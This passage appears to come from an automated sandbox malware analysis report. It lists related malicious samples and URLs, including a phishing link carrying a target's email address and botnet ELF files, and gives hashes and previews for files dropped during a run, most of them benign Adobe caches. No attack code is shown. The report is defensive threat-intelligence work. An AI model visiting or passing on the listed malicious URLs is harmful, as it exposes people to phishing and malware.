	https://url12.mailanyone.net/scanner?m=1tUshS-0000000041D-2l2S&d=4%7Cmail%2F90%2F1736191200%2F1tUshS-0000000041D-2l2S%7Cin12g%7C57e1b682%7C21208867%7C12850088%7C677C2DBECB224D1EED07A26760DE755E&o=%2Fphtp%3A%2Fjtssamcce.ehst.uruirrevam.ctstro%2Fe%3D%2F%3Fixprceetmeat%3Dmn%26aeileplttm%26920%3D09s1-oFmyiSNtMTnafi%25iosctgp40norajmcm.c8p%3D5o%26991dd-86e2ee-4a-9879e6-de5f1dd.%232e.%3D302vp%3D0%26%25ttsdhF23Ap%252a%25Fuii.ctr.vro2omastr%25Fi2ge2ap%25%25FelFp%25cisoie52F21d9c876-89-4e9dd8-9d-d6ea215f22e%25eeFtFde%252maadata%3Da%26kdtuK8rJIg9jKP6GiBXfDGI7Fp%25Lddn2sRxJdhuPpjWD3%25ICb37&s=3NJIrjRA01UUg3P9bWqXPHrWXdk	Get hash	malicious	Unknown	Browse	13.107.253.44
	7ccf88c0bbe3b29bf19d877c4596a8d4.zip	Get hash	malicious	Unknown	Browse	13.107.246.45
	4.elf	Get hash	malicious	Unknown	Browse	51.109.26.124
	http://plnbl.io/review/VdCYQSoKp54z	Get hash	malicious	HTMLPhisher	Browse	13.107.42.14
	https://sUNg.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.com	Get hash	malicious	Unknown	Browse	52.168.117.168
	miori.ppc.elf	Get hash	malicious	Unknown	Browse	22.176.136.250
	miori.x86.elf	Get hash	malicious	Unknown	Browse	21.129.217.0

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\jna-1820491375\jna549618974871912275.dll	06012025_1416_bombastic.hta	Get hash	malicious	Branchlock Obfuscator	Browse
	https://bigdatafriend.com/connect/dbeaver-ce-24.0.0-x86_64-setup.msi	Get hash	malicious	Unknown	Browse
	6XAaqIWeJt.jar	Get hash	malicious	Unknown	Browse
	6XAaqIWeJt.jar	Get hash	malicious	Unknown	Browse
	synapse.jar	Get hash	malicious	Unknown	Browse
	synapse.jar	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\sqlite-3.41.2.1-8817147a-097f-4350-b036-bfca281522c2-sqlitejdbc.dll	06012025_1416_bombastic.hta	Get hash	malicious	Branchlock Obfuscator	Browse

Created / dropped Files

C:\ProgramData\Oracle\Java\.oracle_jre_usage\cacd01212ac9495e.timestamp

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	83
Entropy (8bit):	4.926606786953047
Encrypted:	false
SSDEEP:	3:oNN+EaKC5SufzPNYASUSYdin:oNN7aZ5SubPGASYdin
MD5:	DBB72420A156943DE214F086933D0DF0
SHA1:	F5DF4299A53E6CF7B4026C5F490D01FA988645F4
SHA-256:	EBBA07E9118B1E26AFCC82ED8A73BDCE99A115CDBA7CC496308555C3C0E0E534
SHA-512:	FC50ABC5BC8815749BFBCF06670D58FF54D6BD1A703454A1D1F50018554A6771D8C584AB6E705047028183C9192CAC3FCEAFD736005BDE81F5CA12FE216DA4F6
Malicious:	false
Preview:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8..1736340982208..

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.196144383098795
Encrypted:	false
SSDEEP:	6:iOSGjyq2PN72nKuAl9OmbnIFUtz1ZmwnRkwON72nKuAl9OmbjLJ:7S+yvVaHAahFUtZ/nR5OaHAaSJ
MD5:	8ED973F864782A41F7383E843AD6E609
SHA1:	F74639F2F9334BD8572F6AF00A70649E1F0B64AF
SHA-256:	AE3D4D3A9204A0F121F86AAD49FECC189803205EB8103672F9360E4899A01A8F
SHA-512:	F453A2DA406D4F3730E69A47C0FEEA2AF85147E19A9E1B33A5ACBD403C3CDB1A480042677E41A775C368DE2544519150BCC3484923D69A38B0A867EAFAF3227A
Malicious:	false
Preview:	2025/01/08-07:54:29.703 5c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/08-07:54:29.707 5c4 Recovering log #3.2025/01/08-07:54:29.707 5c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.196144383098795
Encrypted:	false
SSDEEP:	6:iOSGjyq2PN72nKuAl9OmbnIFUtz1ZmwnRkwON72nKuAl9OmbjLJ:7S+yvVaHAahFUtZ/nR5OaHAaSJ
MD5:	8ED973F864782A41F7383E843AD6E609
SHA1:	F74639F2F9334BD8572F6AF00A70649E1F0B64AF
SHA-256:	AE3D4D3A9204A0F121F86AAD49FECC189803205EB8103672F9360E4899A01A8F
SHA-512:	F453A2DA406D4F3730E69A47C0FEEA2AF85147E19A9E1B33A5ACBD403C3CDB1A480042677E41A775C368DE2544519150BCC3484923D69A38B0A867EAFAF3227A
Malicious:	false
Preview:	2025/01/08-07:54:29.703 5c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/08-07:54:29.707 5c4 Recovering log #3.2025/01/08-07:54:29.707 5c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	339
Entropy (8bit):	5.171385437743452
Encrypted:	false
SSDEEP:	6:iOJSMM+q2PN72nKuAl9Ombzo2jMGIFUtN1ZmwnQMVkwON72nKuAl9Ombzo2jMmLJ:7E+vVaHAa8uFUtP/ZV5OaHAa8RJ
MD5:	83B89C96F0B6549B5845D37FC4C7E097
SHA1:	0DBD28E3E9BABB5A27064AF673A5ABA54FEBD40F
SHA-256:	FCA457BC58F23E664329E797E9E0843659247350A66CB5B8C5A6794CFD11D1F6
SHA-512:	1939C26EC1263EEDEC3CF6CA2DCE4636A2192B739D4270561AF8A4BEE800E6EF33B59802650A35008079F410070D85023FFABDDE9C7D05A64BA8EBDC5D90621B
Malicious:	false
Preview:	2025/01/08-07:54:29.819 a1c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/08-07:54:29.821 a1c Recovering log #3.2025/01/08-07:54:29.821 a1c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	339
Entropy (8bit):	5.171385437743452
Encrypted:	false
SSDEEP:	6:iOJSMM+q2PN72nKuAl9Ombzo2jMGIFUtN1ZmwnQMVkwON72nKuAl9Ombzo2jMmLJ:7E+vVaHAa8uFUtP/ZV5OaHAa8RJ
MD5:	83B89C96F0B6549B5845D37FC4C7E097
SHA1:	0DBD28E3E9BABB5A27064AF673A5ABA54FEBD40F
SHA-256:	FCA457BC58F23E664329E797E9E0843659247350A66CB5B8C5A6794CFD11D1F6
SHA-512:	1939C26EC1263EEDEC3CF6CA2DCE4636A2192B739D4270561AF8A4BEE800E6EF33B59802650A35008079F410070D85023FFABDDE9C7D05A64BA8EBDC5D90621B
Malicious:	false
Preview:	2025/01/08-07:54:29.819 a1c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/08-07:54:29.821 a1c Recovering log #3.2025/01/08-07:54:29.821 a1c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\4fbe7d31-f02c-417e-b6eb-c285986a2232.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.96509579916514
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqTVsBdOg2H1gcaq3QYiubcP7E4T3y:Y2sRdsTdMH1L3QYhbA7nby
MD5:	5FD2C39924CC7630D50BFB2963E0BAE0
SHA1:	82CE8B5D3FD9DEF05ADAB72E2A72EE549EF8CFD7
SHA-256:	E30D18DF58BF6160D031B8636016E832275C5C3FC529A0BF59B9F70D748E1602
SHA-512:	A149970192BD9354B07F9BE6A8AC2FE34D99DA80194C15F5C0E821B3A6B2F585E135761AAFBF83A4D4D0C4180FE72B7BEC009249EED38D184F5EB05658F4AAA2
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380900881414670","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":140463},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.96509579916514
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqTVsBdOg2H1gcaq3QYiubcP7E4T3y:Y2sRdsTdMH1L3QYhbA7nby
MD5:	5FD2C39924CC7630D50BFB2963E0BAE0
SHA1:	82CE8B5D3FD9DEF05ADAB72E2A72EE549EF8CFD7
SHA-256:	E30D18DF58BF6160D031B8636016E832275C5C3FC529A0BF59B9F70D748E1602
SHA-512:	A149970192BD9354B07F9BE6A8AC2FE34D99DA80194C15F5C0E821B3A6B2F585E135761AAFBF83A4D4D0C4180FE72B7BEC009249EED38D184F5EB05658F4AAA2
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380900881414670","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":140463},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	5449
Entropy (8bit):	5.249826985692473
Encrypted:	false
SSDEEP:	96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7IJUMC:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhl
MD5:	A9411DFF544F2B5DFA1A36194960E885
SHA1:	F59CBF1D8127FDB2D675CDBB76C382377609C0F4
SHA-256:	67EB45CBF2B3740FA300DFF16064516119D3E3227E6B4613B3CE9B8A1F32DC3D
SHA-512:	2AF4044746485BD30F598742CB15ED669A6D7D957A3D75E0031FB93C0D045699E84F9D9067B4714491876B47583C27E77041368E3575869166FD1A57E0CEAA9D
Malicious:	false
Preview:	*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	327
Entropy (8bit):	5.16842449326163
Encrypted:	false
SSDEEP:	6:iOGEcM+q2PN72nKuAl9OmbzNMxIFUtnJZmwj+SMVkwON72nKuAl9OmbzNMFLJ:7Gi+vVaHAa8jFUtJ/juV5OaHAa84J
MD5:	09C39EE811DCAC97E06C61849FA6F4E8
SHA1:	CA2D4F370B8EA0BE1D6A818711C0757230A9FC31
SHA-256:	B9A951669C37CE31748A5CA30825366F76E1584003FDFE21950504E78E23A2EF
SHA-512:	3A5C1388F3BB92E0BF6DBA4CF89FDC15115062CB3BE9EF083B3F1E33C81170762338E8208DF681681AB3796248EABFBBD872375497D6E9DE17A2F6546E22BD0E
Malicious:	false
Preview:	2025/01/08-07:54:29.920 a1c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/08-07:54:29.922 a1c Recovering log #3.2025/01/08-07:54:29.923 a1c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	327
Entropy (8bit):	5.16842449326163
Encrypted:	false
SSDEEP:	6:iOGEcM+q2PN72nKuAl9OmbzNMxIFUtnJZmwj+SMVkwON72nKuAl9OmbzNMFLJ:7Gi+vVaHAa8jFUtJ/juV5OaHAa84J
MD5:	09C39EE811DCAC97E06C61849FA6F4E8
SHA1:	CA2D4F370B8EA0BE1D6A818711C0757230A9FC31
SHA-256:	B9A951669C37CE31748A5CA30825366F76E1584003FDFE21950504E78E23A2EF
SHA-512:	3A5C1388F3BB92E0BF6DBA4CF89FDC15115062CB3BE9EF083B3F1E33C81170762338E8208DF681681AB3796248EABFBBD872375497D6E9DE17A2F6546E22BD0E
Malicious:	false
Preview:	2025/01/08-07:54:29.920 a1c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/08-07:54:29.922 a1c Recovering log #3.2025/01/08-07:54:29.923 a1c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250108125435Z-227.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 164 x -115 x 32, cbSize 75494, bits offset 54
Category:	dropped
Size (bytes):	75494
Entropy (8bit):	1.7249199621881315
Encrypted:	false
SSDEEP:	96:QxbtNWLmzEL4VyNMdRbwIQ+oFfwNCYDd0/lMzMMMrLMBl+MMfHMP1MVPlSM3s0MP:QxbtNWaeuoMdRbwIQ+oRwHjO2Vcg
MD5:	11F247EA4B8ABEFAD6DCC45012AF7DAF
SHA1:	C4DC0F39E5D031748E582EBA2D9BAAC0F8705B4D
SHA-256:	DA285A0A1993ABD64D1AA66FA7EAC1B4BC51F5BB8CD9ECA2E5B7E1851D6DC61B
SHA-512:	3737A5D66F5C4ADA90C528083E6EFA9B7618999E16246EAA2F987AE4393946E37A9EF155D874F43F4D9CA15B2B229C28F4378FF0263013E896A2FC0235B0F1F6
Malicious:	false
Preview:	BM.&......6...(............. ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 12, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 12
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.444864231620259
Encrypted:	false
SSDEEP:	384:ierci5t1iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:zes3OazzU89UTTgUL
MD5:	E827A715BC9D2A26AC7721441F010111
SHA1:	B94D6A0335F8B3A98D7A14C63FF2358D5EE2B7E2
SHA-256:	9D0111731598C41DB3F28F1287DE10C4829DF3FA66BD2F2E99A7CBC0DFFD9908
SHA-512:	2482A148EB6EA3B3F8A9A1ACFCCC5E320F5FFA18A336D4D41CC1D940B4476AD5670DDCC88E4050555729BBBE012D1E7097335B4EE87E87EF581B5048F2EA61C8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	2.21429883461319
Encrypted:	false
SSDEEP:	24:7+tlnnuwKWfqL0MzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9:7M9nCWfq/mFTIF3XmHjBoGGR+jMz+LhF
MD5:	4124C7C85CF7B3E676D76DAF71E43A0C
SHA1:	5B3777676569BD60C8E64EBC62215D99A9CDAF84
SHA-256:	8BE161073ACD68EA1D39D49EC9188C61F121C2CB4D21C0B80017FDB8F280B5E0
SHA-512:	1C65F4247B6B86F5D5536F0053976713CB733363BCF5516C7374FC9E8FB192D0F39E894D03C48139756FD4FE918C5B2D1BC8282057A28B650593BDF20BBFCE3E
Malicious:	false
Preview:	.... .c.......pX........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.7569015731729736
Encrypted:	false
SSDEEP:	3:kkFkloFXblfllXlE/HT8kn7vNNX8RolJuRdxLlGB9lQRYwpDdt:kKxFqT8CNMa8RdWBwRd
MD5:	A7BBE2D0A13593262147D64BBB63D878
SHA1:	85868C113FBCD4C0EE08CBCBA0EA478F8E7584F9
SHA-256:	7DF5D861A1646829258135D20A3BA367E63AD49F80C981B07E49CCC46DBCC67A
SHA-512:	BE887E9B9E1D7CBCF976F729CC244839E7B45084B86FDA98C67132EF7E58AF75F0EC4E0886F60AE848029B13444125D3B6438967021792F4B3C8A4EA9E121B34
Malicious:	false
Preview:	p...... .........`.y.a..(....................................................... ..........W....y...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.2401865105070087
Encrypted:	false
SSDEEP:	6:kKSF9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:qsDImsLNkPlE99SNxAhUe/3
MD5:	4B07EEA0CC944D1B96E318DF76477368
SHA1:	5B599B6D6397A35D5B1EC59A8561A759B412D1C9
SHA-256:	36336AF02835FFB10B9F28D030BEC4AABA3CAB49AA85A2917BB1D02068D0B32E
SHA-512:	FC91D08E260A11172485163A44A81F193354AA57F792DBCBDBBB20D292DDD6AFAA6567A46794E67BFC9F6A35234275519E7DD6CFC52319F36A51BC861BBC759E
Malicious:	false
Preview:	p...... ........].V..a..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6472

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
